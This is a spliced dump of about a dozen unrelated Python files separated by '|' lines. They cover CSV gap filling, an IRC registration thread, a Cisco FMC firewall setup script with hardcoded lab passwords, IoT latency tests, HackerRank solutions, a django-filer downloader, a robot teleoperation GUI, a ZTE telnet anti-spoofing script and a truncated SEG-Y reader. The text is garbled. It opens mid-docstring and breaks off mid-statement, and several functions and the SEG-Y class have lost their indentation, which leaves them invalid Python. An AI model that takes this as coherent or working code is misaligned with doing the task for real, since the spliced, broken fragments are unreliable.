        This method evaluates 2 lists and returns True if their numerical
        values are similar (mean relative difference <= param), False otherwise.
        """
        total = 0
        size = len(current)
        if (size != len(toCompare)):
            return False
        else:
            for i in range(size):
                try:
                    total += abs(current[i] - toCompare[i])/current[i]
                except:
                    total +=0
            prom = total/size
            if (prom <= param):
                return True
            else:
                return False
    def relativeRegression(self):
        """Fill empty cells by copying the value from the most similar row."""
        data = self.Transposed(self.currentData) #Python matrix
        a = np.array(data) #numpy matrix
        cont = 0
        for i in range(len(a)):
            for j in range(len(a[i])):
                if (a[i][j] == ''):
                    for k in a:
                        if (self.isLike(k,a[i],0.5) and k[j] != ''):
                            a[i][j] = k[j]
        data = a
        self.currentData = self.Transposed(data)
    def store(self):
        """
        Store all the data in a csv file named self.saveFile, re-inserting
        the untouched non-numeric columns from the original rows.
        """
        name = self.saveFile
        with open(name, mode='w') as data_file:
            data_file = csv.writer(data_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
            data_file.writerow(self.allTitles)
            matrix = self.Transposed(self.currentData)
            firstCount=0
            for row in matrix:
                values = []
                count = 0
                for element in row:
                    if(element!=''):
                        values.append(element.getValue())
                    else:
                        values.append('')
                    if(self.index.count(count)==0):
                        # Non-numeric column: restore the original raw value.
                        values.insert(count,self.realData[firstCount][count])
                    count+=1
                index_count = 0
                for val in values:
                    print(self.allTitles[index_count] + ": " + str(val))
                    index_count+=1
                print("\n")
                data_file.writerow(values)
                firstCount+=1
        print("Data stored in " + name)
#------------------------------------------------------------------------------
|
import threading
import socket
import re
import sys
import errno
import re
from user import IRCUser
class ServerThread(threading.Thread):
    '''
    Multi-threading clients.

    One thread per accepted client connection: walks the client through
    USER/NICK registration, then joins it to the #global channel.
    '''
    def __init__(self):
        threading.Thread.__init__(self, daemon=True)

    def setup(self, __client, __address, server_instance, logger):
        """Attach the accepted socket and initialise per-connection state."""
        self.ircuser = IRCUser()
        self.authenticated = False
        self.joinedChannel = False
        self.client = __client
        self.address = __address
        self.server_instance = server_instance
        self.logger = logger

    def isAuthenticated(self):
        """Return True once USER and NICK have both been accepted."""
        return self.authenticated

    # def connect(self):
    #     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def run(self):
        """Registration loop: read USER/NICK commands until authenticated.

        FIXES vs. original: removed the unused local flag `b` (it was set
        but never read), and made the regex literals raw strings so the
        `\\W`/`\\S` escapes no longer trigger invalid-escape warnings (the
        pattern text is byte-identical).
        """
        re_user = re.compile(r'(USER)\W(\S+)')
        re_nick = re.compile(r'(NICK)\W(\S+)')
        self.send_resp('Using IRC commands, please set your username and nickname\n USER <username>\n NICK <nickname>')
        try:
            while not self.authenticated:
                try:
                    data = self.client.recv(1024)
                    if data:
                        m_user = re_user.match(str(data, 'utf-8'))
                        m_nick = re_nick.match(str(data, 'utf-8'))
                        if m_user:
                            self.ircuser.setUsername(m_user.group(2))
                            resp = 'USER set to ' + self.ircuser.getUsername()
                            self.send_resp(resp)
                        elif m_nick:
                            self.ircuser.setNickname(m_nick.group(2))
                            resp = 'NICK set to ' + self.ircuser.getNickname()
                            self.send_resp(resp)
                        # Prompt for whichever credential is still missing.
                        if not self.ircuser.getUsername():
                            self.send_resp('Please set your username first using USER <username>')
                        elif not self.ircuser.getNickname():
                            self.send_resp('Please set your nickname using NICK <nickname>')
                        else:
                            self.authenticate()
                    else:
                        # Empty recv() means the peer closed the connection.
                        self.logger.debug('%s has disconnected', self.client)
                        break
                except IOError as e:
                    if e.errno == errno.EPIPE:
                        print('IO Error', self.client)
        except KeyboardInterrupt:
            # NOTE(review): joining the *current* thread from inside run()
            # raises RuntimeError; kept unchanged pending a design decision.
            self.join()
        self.joinChannel()

    def authenticate(self):
        """Mark the session authenticated and greet the user."""
        self.authenticated = self.ircuser.isAuthenticated()
        if self.authenticated:
            resp = 'Welcome ' + self.ircuser.getNickname() + '! -- User authenticated -- '
            self.send_resp(resp)

    def joinChannel(self):
        """Join the default #global channel and confirm to the client."""
        self.ircuser.joinChannel('#global')
        self.joinedChannel = self.ircuser.joinedChannel()
        resp = 'Joined channel ' + self.ircuser.getChannel()
        self.send_resp(resp)

    def send_resp(self, msg):
        """Send *msg* to the client, prefixed with the 'client~' marker."""
        resp = 'client~'+msg
        self.client.send(bytes(resp, 'utf-8'))
|
"""
Configure FMC for hq-ftd, register hq-ftd and push changes to it.
"""
import fmcapi # You can use 'from fmcapi import *' but it is best practices to keep the namespaces separate.
def main():
    """
    The hq-ftd device already has 10.0.0.254 on its manage interface and the command 'configure network manager
    10.0.0.10 cisco123' has already been manually typed on the FTD's CLI.

    Builds the FMC configuration (ACP, security zones, network objects,
    ACP rule, NAT policy/rules), registers the hq-ftd device, configures
    its interfaces and default route, and associates the NAT policy.
    With autodeploy=True, changes are pushed when the context manager exits.
    """
    # ### Set these variables to match your environment. ### #
    host = "10.0.0.10"
    username = "apiadmin"
    password = "Admin123"
    with fmcapi.FMC(
        host=host,
        username=username,
        password=password,
        autodeploy=True,
        file_logging="hq-ftd.log",
    ) as fmc1:
        # Create an ACP
        # I intentionally put a "space" in the ACP name to show that fmcapi will "fix" that for you.
        acp = fmcapi.AccessPolicies(fmc=fmc1, name="ACP Policy")
        acp.defaultAction = "BLOCK"
        acp.post()
        # Create Security Zones
        sz_inside = fmcapi.SecurityZones(
            fmc=fmc1, name="inside", interfaceMode="ROUTED"
        )
        sz_inside.post()
        sz_outside = fmcapi.SecurityZones(
            fmc=fmc1, name="outside", interfaceMode="ROUTED"
        )
        sz_outside.post()
        sz_dmz = fmcapi.SecurityZones(fmc=fmc1, name="dmz", interfaceMode="ROUTED")
        sz_dmz.post()
        # Create Network Objects
        hq_dfgw_gateway = fmcapi.Hosts(
            fmc=fmc1, name="hq-default-gateway", value="100.64.0.1"
        )
        hq_dfgw_gateway.post()
        hq_lan = fmcapi.Networks(fmc=fmc1, name="hq-lan", value="10.0.0.0/24")
        hq_lan.post()
        all_lans = fmcapi.Networks(fmc=fmc1, name="all-lans", value="10.0.0.0/8")
        all_lans.post()
        hq_fmc = fmcapi.Hosts(fmc=fmc1, name="hq_fmc", value="10.0.0.10")
        hq_fmc.post()
        fmc_public = fmcapi.Hosts(fmc=fmc1, name="fmc_public_ip", value="100.64.0.10")
        fmc_public.post()
        # Create ACP Rule to permit hq_lan traffic inside to outside.
        hq_acprule = fmcapi.AccessRules(
            fmc=fmc1,
            acp_name=acp.name,
            name="Permit HQ LAN",
            action="ALLOW",
            enabled=True,
        )
        hq_acprule.source_zone(action="add", name=sz_inside.name)
        hq_acprule.destination_zone(action="add", name=sz_outside.name)
        hq_acprule.source_network(action="add", name=hq_lan.name)
        hq_acprule.destination_network(action="add", name="any-ipv4")
        # hq_acprule.logBegin = True
        # hq_acprule.logEnd = True
        hq_acprule.post()
        # Build NAT Policy
        nat = fmcapi.FTDNatPolicies(fmc=fmc1, name="NAT Policy")
        nat.post()
        # Build NAT Rule to NAT all_lans to interface outside
        autonat = fmcapi.AutoNatRules(fmc=fmc1)
        autonat.natType = "DYNAMIC"
        autonat.interfaceInTranslatedNetwork = True
        autonat.original_network(all_lans.name)
        autonat.source_intf(name=sz_inside.name)
        autonat.destination_intf(name=sz_outside.name)
        autonat.nat_policy(name=nat.name)
        autonat.post()
        # Build NAT Rule to allow inbound traffic to FMC (Branches need to register to FMC.)
        fmc_nat = fmcapi.ManualNatRules(fmc=fmc1)
        fmc_nat.natType = "STATIC"
        fmc_nat.original_source(hq_fmc.name)
        fmc_nat.translated_source(fmc_public.name)
        fmc_nat.source_intf(name=sz_inside.name)
        fmc_nat.destination_intf(name=sz_outside.name)
        fmc_nat.nat_policy(name=nat.name)
        fmc_nat.enabled = True
        fmc_nat.post()
        # Add hq-ftd device to FMC
        hq_ftd = fmcapi.DeviceRecords(fmc=fmc1)
        # Minimum things set.
        hq_ftd.hostName = "10.0.0.254"
        hq_ftd.regKey = "cisco123"
        hq_ftd.acp(name=acp.name)
        # Other stuff I want set.
        hq_ftd.name = "hq-ftd"
        hq_ftd.licensing(action="add", name="MALWARE")
        hq_ftd.licensing(action="add", name="VPN")
        hq_ftd.licensing(action="add", name="BASE")
        hq_ftd.licensing(action="add", name="THREAT")
        hq_ftd.licensing(action="add", name="URLFilter")
        # Push to FMC to start device registration.
        # (post_wait_time gives registration up to 300s to complete.)
        hq_ftd.post(post_wait_time=300)
        # Once registration is complete configure the interfaces of hq-ftd.
        hq_ftd_g00 = fmcapi.PhysicalInterfaces(fmc=fmc1, device_name=hq_ftd.name)
        hq_ftd_g00.get(name="GigabitEthernet0/0")
        hq_ftd_g00.enabled = True
        hq_ftd_g00.ifname = "IN"
        hq_ftd_g00.static(ipv4addr="10.0.0.1", ipv4mask=24)
        hq_ftd_g00.sz(name="inside")
        hq_ftd_g00.put()
        hq_ftd_g01 = fmcapi.PhysicalInterfaces(fmc=fmc1, device_name=hq_ftd.name)
        hq_ftd_g01.get(name="GigabitEthernet0/1")
        hq_ftd_g01.enabled = True
        hq_ftd_g01.ifname = "OUT"
        hq_ftd_g01.static(ipv4addr="100.64.0.200", ipv4mask=24)
        hq_ftd_g01.sz(name="outside")
        hq_ftd_g01.put()
        # Build static default route for HQ FTD
        hq_default_route = fmcapi.IPv4StaticRoutes(fmc=fmc1, name="hq_default_route")
        hq_default_route.device(device_name=hq_ftd.name)
        hq_default_route.networks(action="add", networks=["any-ipv4"])
        hq_default_route.gw(name=hq_dfgw_gateway.name)
        hq_default_route.interfaceName = hq_ftd_g01.ifname
        hq_default_route.metricValue = 1
        hq_default_route.post()
        # Associate NAT policy with HQ FTD device.
        devices = [{"name": hq_ftd.name, "type": "device"}]
        assign_nat_policy = fmcapi.PolicyAssignments(fmc=fmc1)
        assign_nat_policy.ftd_natpolicy(name=nat.name, devices=devices)
        assign_nat_policy.post()
if __name__ == "__main__":
    main()
|
from hue import HueControlUtil as hue
from wemo import WemoControlUtil as wemo
from alexa import AlexaControlUtil as alexa
import time, os, sys, argparse, datetime
def testWemoHueLocalRecipe(argv):
    """Measure the latency of the local WeMo -> Hue recipe.

    Recipe under test: when the WeMo switch is turned on, turn on the given
    Hue light. Each iteration resets both devices, triggers the switch and
    times how long the light takes to report 'on'.

    argv: command-line arguments (-iterNum, -lightId, -wemoport).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-iterNum", default = 5, type = int)
    parser.add_argument("-lightId", default = 2, type = int)
    parser.add_argument("-wemoport", type = int, default = 10085)
    options = parser.parse_args(argv)
    hueController = hue.HueController()
    bind = "0.0.0.0:{}".format(options.wemoport)
    switchName = "WeMo Switch1"
    lightId = options.lightId
    wemoController = wemo.WemoController(bind = bind)
    switch = wemoController.discoverSwitch(switchName)
    if switch is None:
        # Fixed wording of the error message ("error to locate" -> "failed to locate").
        print("failed to locate the switch")
        sys.exit(1)
    else:
        # Typo fix: 'discoverred' -> 'discovered'.
        print("switch discovered")
    # test recipe: when wemo switch is turned on, turn on lights in living room
    hueController.turnonLight(lightId)
    time.sleep(3)
    for index in range(options.iterNum):
        print("start test iteration {}".format(index))
        hueController.turnoffLight(lightId)
        wemoController.turnoffSwitch(switchName)
        # generate trigger event: turn on switch
        wemoController.turnonSwitch(switchName)
        # Typo fix: 'turned one' -> 'turned on'.
        print("switch turned on")
        startTime = datetime.datetime.now()
        # Busy-wait until the light reports on.
        # NOTE(review): no timeout -- a missed trigger hangs this loop forever.
        while (True):
            if hueController.isLightOn(lightId):
                break
            time.sleep(0.5)
        endTime = datetime.datetime.now()
        timeDiff = endTime - startTime
        print("time cost for iter {} is {} seconds and microseconds {}".format(index, timeDiff.seconds, timeDiff.microseconds))
        print("sleep before next test")
        time.sleep(5)
def testAlexaHueRecipe(argv):
    '''
    test the following recipe:
    If You say "Alexa trigger turn on hue light", then turn on lights in Living room

    Measures, over `iterNum` iterations, the delay between issuing the voice
    command to Alexa and the Hue light actually reporting 'on'.

    argv: command-line arguments (-iterNum, -lightId).
    '''
    parser = argparse.ArgumentParser()
    parser.add_argument("-iterNum", default = 5, type = int)
    parser.add_argument("-lightId", default = 2, type = int)
    options = parser.parse_args(argv)
    hueController = hue.HueController()
    lightId = options.lightId
    alexaController = alexa.AlexaController()
    # Recipe: when the Alexa trigger phrase is spoken, turn on the light.
    # (The original comment mentioned the WeMo switch -- copy-paste leftover.)
    for index in range(options.iterNum):
        hueController.turnoffLight(lightId)
        # generate trigger event: speak to alexa: turn on hue light
        alexaController.turnonHueLight()
        print("send out voice command to alexa")
        startTime = datetime.datetime.now()
        # Busy-wait until the light turns on.
        # NOTE(review): no timeout -- a failed trigger hangs this loop forever.
        while (True):
            if hueController.isLightOn(lightId):
                break
            time.sleep(0.1)
        endTime = datetime.datetime.now()
        timeDiff = endTime - startTime
        print("time cost for iter {} is {} seconds and microseconds {}".format(index, timeDiff.seconds, timeDiff.microseconds))
# Map CLI recipe names to their test drivers.
# Fix: the WeMo+Hue driver is defined as `testWemoHueLocalRecipe`; the
# previous reference to a non-existent `testWemoHueRecipe` raised a
# NameError as soon as the module was loaded.
recipeTypeDict = {
    "alexaHue" : testAlexaHueRecipe,
    "wemoHue" : testWemoHueLocalRecipe,
}
# CLI entry point: the first argument selects a recipe driver from
# `recipeTypeDict`; the remaining arguments are forwarded to that driver's
# own argparse parser.
if __name__ == "__main__":
    recipeName = sys.argv[1]
    if recipeName not in recipeTypeDict:
        print("please provide recipeType from this list: ", recipeTypeDict)
        sys.exit(1)
    recipeFunc = recipeTypeDict[recipeName]
    recipeFunc(sys.argv[2:])
|
# https://www.hackerrank.com/challenges/piling-up
from collections import deque
def stackable(cubes):
    """Return 'Yes' if `cubes` can be piled into a vertical stack, else 'No'.

    A cube may only be taken from the left or right end of the row, and each
    cube placed must be no larger than the one below it (the current top).
    Greedy strategy: always take the larger of the two ends.

    Fix: the previous version popped BOTH ends every step and silently
    discarded the smaller one, so rows like [1, 9, 2, 8, 10] were wrongly
    accepted. Now exactly one end cube is taken (and checked) per step.

    Consumes `cubes` (a collections.deque) in place, like the original.
    """
    if not cubes:
        return 'No'
    top = float('inf')  # sentinel: the first cube always fits
    while cubes:
        # Take the larger end; ties go to the left.
        pick = cubes.popleft() if cubes[0] >= cubes[-1] else cubes.pop()
        if pick > top:
            return 'No'
        top = pick
    return 'Yes'
# Read T test cases; each case is a count line followed by the row of cubes.
num_cases = int(input().strip())
for _case in range(num_cases):
    _ = int(input().strip())  # row length; stackable infers it from the deque
    row = deque(map(int, input().strip().split()))
    print(stackable(row))
# not using deque, imperative version:
# A row is stackable iff it is a "valley": non-increasing, then non-decreasing.
num_cases = int(input().strip())
for _case in range(num_cases):
    n = int(input().strip())
    heights = tuple(map(int, input().strip().split()))
    k = 0
    # Walk down the non-increasing prefix...
    while k < n - 1 and heights[k] >= heights[k + 1]:
        k += 1
    # ...then up the non-decreasing suffix.
    while k < n - 1 and heights[k] <= heights[k + 1]:
        k += 1
    print('Yes' if k == n - 1 else 'No')
'''
FUNCTIONAL (BUT SLOW) VERSION:
To change while loop to functional version, use recursion.
def func(my_list, z):
if z == len(my_list):
return something
else:
# do something else
return func(my_list, z+1)
In this version, we use tail-call recursion
(Which might be best if Python supported tail-call optimization).
To know more about tail-call optimization in Python,
read this 'What have we gained?' in this document:
http://blog.moertel.com/posts/2013-05-11-recursive-to-iterative.html
'''
def test_then_change_arg(tracking_arg, change_func, test_func,
*args, **kwargs):
if test_func(tracking_arg, *args, **kwargs):
return test_then_change_arg(change_func(tracking_arg),
change_func, test_func,
*args, **kwargs)
else:
return tracking_arg
def add_one(number):
    """Return *number* incremented by one (step function for the recursion)."""
    return number + 1
def stackable(cubes):
    """Functional variant: a row is stackable iff it is non-increasing and
    then non-decreasing. Walks the boundary index with the recursive helper
    `test_then_change_arg` instead of explicit while-loops."""
    n = len(cubes)

    def still_descending(k, seq, length):
        # True while the next step stays on the non-increasing prefix.
        return k < length - 1 and seq[k] >= seq[k + 1]

    def still_ascending(k, seq, length):
        # True while the next step stays on the non-decreasing suffix.
        return k < length - 1 and seq[k] <= seq[k + 1]

    pos = test_then_change_arg(0, add_one, still_descending, cubes, n)
    pos = test_then_change_arg(pos, add_one, still_ascending, cubes, n)
    return 'Yes' if pos == n - 1 else 'No'
# Same driver as above, feeding the functional `stackable` with tuples.
num_cases = int(input().strip())
for _case in range(num_cases):
    _ = int(input().strip())  # row length; stackable uses len(cubes)
    row = tuple(map(int, input().strip().split()))
    print(stackable(row))
|
import os
from tempfile import NamedTemporaryFile
import requests
from filer.models.filemodels import File
from filer.models.imagemodels import Image
from django.core.files import File as BaseFile
IMAGE_TYPES = ("jpg", "jpeg", "png", "tiff", "tif", "gif")
def url_to_filer(url, folder=None, headers=None):
    """Download `url` into django-filer, reusing a matching existing file.

    Returns a filer `Image` (for known image extensions) or a generic `File`.

    Parameters
    ----------
    url : str
        Direct link to the resource; its last path segment becomes the name.
    folder : filer Folder, optional
        Destination folder for a newly created file.
    headers : dict, optional
        Extra HTTP headers passed to `requests.get`.
    """
    # Pick the model class by file extension.
    if any([url.strip().lower().endswith(it) for it in IMAGE_TYPES]):
        cls_ = Image
    else:
        cls_ = File
    name = url.rsplit("/", 1)[-1]
    # Best-effort reuse: if a same-named file exists, is backed by real
    # storage, and isn't a cached HTML error page, return it. Any failure
    # (no match -> `inst` is None, missing file, bad content) deliberately
    # falls through to a fresh download.
    try:
        inst = cls_.objects.filter(name__exact=name).first()
        inst.file._require_file()
        assert b"DOCTYPE HTML" not in inst.file.read(100)
        return inst
    except Exception:
        pass
    # Stream the response into a temp file, then hand it to filer's storage.
    with NamedTemporaryFile() as tempfile:
        with requests.get(url, headers=headers, stream=True) as img_res:
            for chunk in img_res.iter_content(chunk_size=1024):
                tempfile.write(chunk)
        tempfile.flush()
        doc_ = cls_.objects.create(folder=folder, name=name)
        # File.save copies the temp file's contents into filer storage.
        doc_.file.save(doc_.name, BaseFile(tempfile))
        doc_.file_data_changed()
        doc_.save()
    return doc_
def local_file_filer(path, folder=None, headers=None):
    """Import a local file at `path` into django-filer.

    Returns a filer `Image` (for known image extensions) or a generic `File`.
    `headers` is accepted for signature parity with `url_to_filer` but unused.
    """
    assert os.path.exists(path)
    with open(path, "rb") as basefile:
        # Pick the model class by file extension.
        if path.lower().rsplit(".", 1)[-1] in IMAGE_TYPES:
            cls_ = Image
        else:
            cls_ = File
        doc_ = cls_.objects.create(folder=folder, name=path.rsplit("/", 1)[-1])
        # File.save copies the open file's contents into filer storage.
        doc_.file.save(doc_.name, BaseFile(basefile))
        doc_.file_data_changed()
        doc_.save()
    return doc_
|
import tkinter
import numpy as np
from PIL import ImageTk, Image
from duckietown_slimremote.helpers import random_id
from duckietown_slimremote.networking import make_push_socket, construct_action
from duckietown_slimremote.pc.camera import SubCameraMaster
class RemoteRobot():
    """Client for a robot reachable over the network: actions are pushed
    through a ZMQ socket, observations arrive via a camera subscriber."""

    def __init__(self, host):
        self.host = host
        self.id = random_id()
        self.ping_msg = construct_action(self.id)
        self.robot_sock = make_push_socket(host)
        # The first message announces this client to the robot.
        self.robot_sock.send_string(self.ping_msg)
        self.cam = SubCameraMaster(host)

    def step(self, action, with_observation=True):
        """Send one action; optionally block until a camera frame arrives."""
        assert len(action) in (2, 5)
        message = construct_action(self.id, action=action)
        # run action on robot
        self.robot_sock.send_string(message)
        print("sent action:", message)
        # return last known camera image #FIXME: this must be non-blocking and re-send ping if necessary
        if not with_observation:
            return None
        return self.cam.get_img_blocking()

    def observe(self):
        """Fetch the most recent camera frame (blocking)."""
        return self.cam.get_img_blocking()

    def reset(self):
        # This purposefully doesn't do anything on the real robot (other than halt).
        # But in sim this obviously resets the simulation
        return self.step([0, 0])
class KeyboardControlledRobot():
    """Tk window that forwards arrow-key presses to a RemoteRobot and shows
    the live camera stream."""
    def __init__(self, host):
        self.robot = RemoteRobot(host)
        self.rootwindow = tkinter.Tk()
        # Keycodes of currently held keys; combinations map to diagonal motion.
        self.history = []
        frame = tkinter.Frame(self.rootwindow, width=1, height=1)
        frame.bind("<KeyPress>", self.keydown)
        frame.bind("<KeyRelease>", self.keyup)
        frame.pack()
        # Creates a Tkinter-compatible photo image, which can be used everywhere Tkinter expects an image object.
        im = Image.fromarray(np.zeros((160,120,3),dtype=np.uint8))
        self.img = ImageTk.PhotoImage(im)
        self.panel = tkinter.Label(self.rootwindow, image=self.img)
        # The Pack geometry manager packs widgets in rows or columns.
        self.panel.pack(side="bottom", fill="both", expand="yes")
        frame.focus_set()
        # Poll for a fresh frame every 200 ms; mainloop() blocks from here on.
        self.rootwindow.after(200, self.updateImg)
        self.rootwindow.mainloop()
    def updateImg(self):
        # Re-schedule first, then fetch and display the newest observation.
        self.rootwindow.after(200, self.updateImg)
        obs = self.robot.observe()
        img2 = ImageTk.PhotoImage(Image.fromarray(obs))
        self.panel.configure(image=img2)
        # Keep a Python reference: Tk does not own the PhotoImage, so without
        # this the image would be garbage-collected and the panel go blank.
        self.panel.image = img2
        return
    def keyup(self, e):
        # Key released: drop it from the held set and re-send the action.
        if e.keycode in self.history:
            self.history.pop(self.history.index(e.keycode))
        self.moveRobot()
    def moveRobot(self):
        # Translate the current key combination into wheel velocities and send.
        action = self.keysToAction()
        _ = self.robot.step(action, with_observation=False)
    def keydown(self, e):
        # Key pressed: remember it (once) and re-send the action.
        if not e.keycode in self.history:
            self.history.append(e.keycode)
        self.moveRobot()
    def keysToAction(self):
        # Map held keys to a [left_wheel, right_wheel] velocity pair.
        # NOTE(review): the magic numbers look like platform-specific Tk
        # keycodes for the arrow keys (likely macOS) -- confirm on target OS.
        action = np.array([0,0])
        if 8320768 in self.history and 8189699 in self.history: # UP/RIGHT
            action = np.array([.3, .9])
        elif 8320768 in self.history and 8124162 in self.history: # UP/LEFT
            action = np.array([.9, .3])
        elif 8255233 in self.history and 8189699 in self.history: # DOWN/RIGHT
            action = np.array([-.3, -.9])
        elif 8255233 in self.history and 8124162 in self.history: # DOWN/LEFT
            action = np.array([-.9, -.3])
        elif 8320768 in self.history: # UP
            action = np.array([.9,.9])
        elif 8189699 in self.history: # RIGHT
            action = np.array([-.7,.7])
        elif 8255233 in self.history: # DOWN
            action = np.array([-.8,-.8])
        elif 8124162 in self.history: # LEFT
            action = np.array([.7,-.7])
        return action
|
# Convert a temperature read from the user from Celsius to Fahrenheit.
celsius = float(input('Informe a temperatura em C: '))
fahrenheit = celsius * 9 / 5 + 32
print(f'A temperatura de {celsius}ºC corresponde a {fahrenheit}ºF!')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pexpect
import re
import os
def zte_telnet(ip, username='', passwd=''):
    """Open a telnet session to a ZTE device and log in (Python 2 code).

    :ip: management IP address of the device
    :username: login name (default empty)
    :passwd: login password (default empty)
    :returns: a logged-in pexpect spawn object, or None on EOF/timeout
    """
    child = pexpect.spawn("telnet %s" % ip)
    # Mirror the whole session into a log file (`file` is the Py2 builtin).
    # NOTE(review): the log handle is never closed and is overwritten per call.
    fout = file('1.log', 'w')
    child.logfile = fout
    try:
        child.expect("[uU]sername:")
        child.sendline(username)
        child.expect("[pP]assword:")
        child.sendline(passwd)
        # Wait for the privileged prompt.
        child.expect(".*#")
    except (pexpect.EOF, pexpect.TIMEOUT):
        print "%s:telnet fail" % ip
        child.close(force=True)
        return None
    return child
def mac(record):
    """Enable MAC anti-spoofing on the device named in `record` (Python 2).

    :record: one CSV line whose first field is the device IP
    :returns: 'success' if all commands were sent, otherwise 'fail'
    """
    try:
        ip = record.split(',')[0].strip()
        child = zte_telnet(ip)
        if child is None:
            return 'fail'
        else:
            # Enter config mode and switch on both anti-spoofing features,
            # waiting for the prompt after each command.
            child.sendline('conf t')
            child.expect('#')
            child.sendline('security mac-spoofing-trap enable')
            child.expect('#')
            child.sendline('security mac-anti-spoofing enable')
            child.expect('#')
            child.sendline('exit')
            child.expect('#')
            child.sendline('exit')
            child.close()
            return 'success'
    except (pexpect.EOF, pexpect.TIMEOUT):
        child.close(force=True)
        return 'fail'
def zte_mac_anti(olts='zte.txt'):
    """Run `mac` for every OLT listed in `olts`, logging per-device results.

    :olts: text file with one CSV record per line (device IP in field one)
    """
    result_file = 'result/zte.log'
    # Start from an empty result file on each run.
    if os.path.exists(result_file):
        os.remove(result_file)
    # NOTE(review): os.mknod requires the 'result' directory to exist and is
    # not portable to all platforms -- confirm the runtime environment.
    os.mknod(result_file)
    with open(olts) as folts:
        for x in folts:
            print x
            mark = mac(x)
            # Append one status line per device as we go.
            if mark == 'success':
                with open(result_file, 'a') as fresult:
                    fresult.write('%s:success\n' % x.strip())
            else:
                with open(result_file, 'a') as fresult:
                    fresult.write('%s:fail\n' % x.strip())
|
from itertools import permutations
def solution(babbling):
    """Count the babbling words that can be pronounced.

    A word is pronounceable if it is a concatenation of the four sounds
    "aya", "ye", "woo", "ma", each used at most once.

    Improvements over the original: the pronounceable words are collected
    into a set (O(1) membership instead of scanning a list per word), and
    the hard-coded `range(1, 5)` is derived from the number of sounds.
    """
    sounds = ("aya", "ye", "woo", "ma")
    # Pre-compute every pronounceable word once.
    speakable = set()
    for length in range(1, len(sounds) + 1):
        speakable.update(''.join(combo) for combo in permutations(sounds, length))
    return sum(1 for word in babbling if word in speakable)
""" SEG-Y geometry. """
import os
from itertools import product
import numpy as np
import pandas as pd
import h5pickle as h5py
import segyio
import cv2
from .base import SeismicGeometry
from ..utils import find_min_max, lru_cache, SafeIO
from ...batchflow import Notifier
class SeismicGeometrySEGY(SeismicGeometry):
""" Class to infer information about SEG-Y cubes and provide convenient methods of working with them.
A wrapper around `segyio` to provide higher-level API.
In order to initialize instance, one must supply `path`, `headers` and `index`:
- `path` is a location of SEG-Y file
- `headers` is a sequence of trace headers to infer from the file
- `index_headers` is a subset of `headers` that is used as trace (unique) identifier:
for example, `INLINE_3D` and `CROSSLINE_3D` have a one-to-one correspondence with trace numbers.
Another example is `FieldRecord` and `TraceNumber`.
Default values of `headers` and `index_headers` are ones for post-stack seismic
(with correctly filled `INLINE_3D` and `CROSSLINE_3D` headers),
so that post-stack cube can be loaded by providing path only.
Each instance is basically built around `dataframe` attribute, which describes mapping from
indexing headers to trace numbers. It is used to, for example, get all trace indices from a desired `FieldRecord`.
`set_index` method can be called to change indexing headers of the dataframe.
One can add stats to the instance by calling `collect_stats` method, that makes a full pass through
the cube in order to analyze distribution of amplitudes. It also collects a number of trace examples
into `trace_container` attribute, that can be used for later evaluation of various statistics.
"""
#pylint: disable=attribute-defined-outside-init, too-many-instance-attributes, redefined-builtin
def __init__(self, path, headers=None, index_headers=None, **kwargs):
    """Remember header configuration and let the base class drive setup.

    Parameters
    ----------
    path : str
        Location of the SEG-Y file.
    headers : sequence, optional
        Trace headers to load; defaults to `HEADERS_POST_FULL`.
    index_headers : sequence, optional
        Subset of `headers` used as the trace identifier; defaults to `INDEX_POST`.
    """
    self.structured = False   # raw SEG-Y: no pre-converted 3D storage
    self.quantized = False    # amplitudes kept as floats, not int8
    self.dataframe = None
    self.segyfile = None
    self.headers = headers or self.HEADERS_POST_FULL
    self.index_headers = index_headers or self.INDEX_POST
    # Base-class init eventually calls `process` to fill the attributes above.
    super().__init__(path, **kwargs)
def set_index(self, index_headers, sortby=None):
    """ Change current index to a subset of loaded headers.

    Parameters
    ----------
    index_headers : sequence
        Header names to use as the new dataframe index.
    sortby : sequence, optional
        If truthy, triggers a stable sort before re-indexing.
        NOTE(review): the sort keys are `index_headers`, not `sortby` --
        `sortby` only toggles the sort; confirm this is intended.
    """
    self.dataframe.reset_index(inplace=True)
    if sortby:
        self.dataframe.sort_values(index_headers, inplace=True, kind='mergesort')# the only stable sorting algorithm
    self.dataframe.set_index(index_headers, inplace=True)
    self.index_headers = index_headers
    # Derived attributes (uniques, lens, offsets, ...) depend on the index.
    self.add_attributes()
# Methods of inferring dataframe and amplitude stats
def process(self, collect_stats=True, recollect=False, **kwargs):
    """ Create dataframe based on `segy` file headers.

    Opens the file with `segyio` structure inference disabled, reads the
    requested trace headers into a dataframe indexed by `index_headers`,
    and optionally collects amplitude statistics.

    Parameters
    ----------
    collect_stats : bool
        Whether to collect amplitude stats when no stored meta exists.
    recollect : bool
        Force re-collection even if a meta file is present.
    """
    # Note that all the `segyio` structure inference is disabled
    self.segyfile = SafeIO(self.path, opener=segyio.open, mode='r', strict=False, ignore_geometry=True)
    self.segyfile.mmap()
    # Vertical info: samples per trace, recording delay, sample rate in ms.
    self.depth = len(self.segyfile.trace[0])
    self.delay = self.segyfile.header[0].get(segyio.TraceField.DelayRecordingTime)
    self.sample_rate = segyio.dt(self.segyfile) / 1000
    # Load all the headers
    dataframe = {}
    for column in self.headers:
        dataframe[column] = self.segyfile.attributes(getattr(segyio.TraceField, column))[slice(None)]
    dataframe = pd.DataFrame(dataframe)
    dataframe.reset_index(inplace=True)
    # `trace_index` preserves the original trace sequence number per row.
    dataframe.rename(columns={'index': 'trace_index'}, inplace=True)
    self.dataframe = dataframe.set_index(self.index_headers)
    self.add_attributes()
    # Collect stats, if needed and not collected previously
    if os.path.exists(self.path_meta) and not recollect:
        self.load_meta()
        self.has_stats = True
    elif collect_stats:
        self.collect_stats(**kwargs)
    # Create a matrix with ones at fully-zero traces
    if self.index_headers == self.INDEX_POST and not hasattr(self, 'zero_traces'):
        try:
            # Probe 9 evenly spaced depth slices; a trace with zero std over
            # them is treated as dead.
            size = self.depth // 10
            slc = np.stack([self[:, :, i * size] for i in range(1, 10)], axis=0)
            self.zero_traces = np.zeros(self.lens, dtype=np.int32)
            self.zero_traces[np.std(slc, axis=0) == 0] = 1
        except (ValueError, AttributeError): # can't reshape
            pass
    # Store additional segy info
    self.segy_path = self.path
    self.segy_text = [self.segyfile.text[i] for i in range(1 + self.segyfile.ext_headers)]
    # Computed from CDP_X/CDP_Y information
    try:
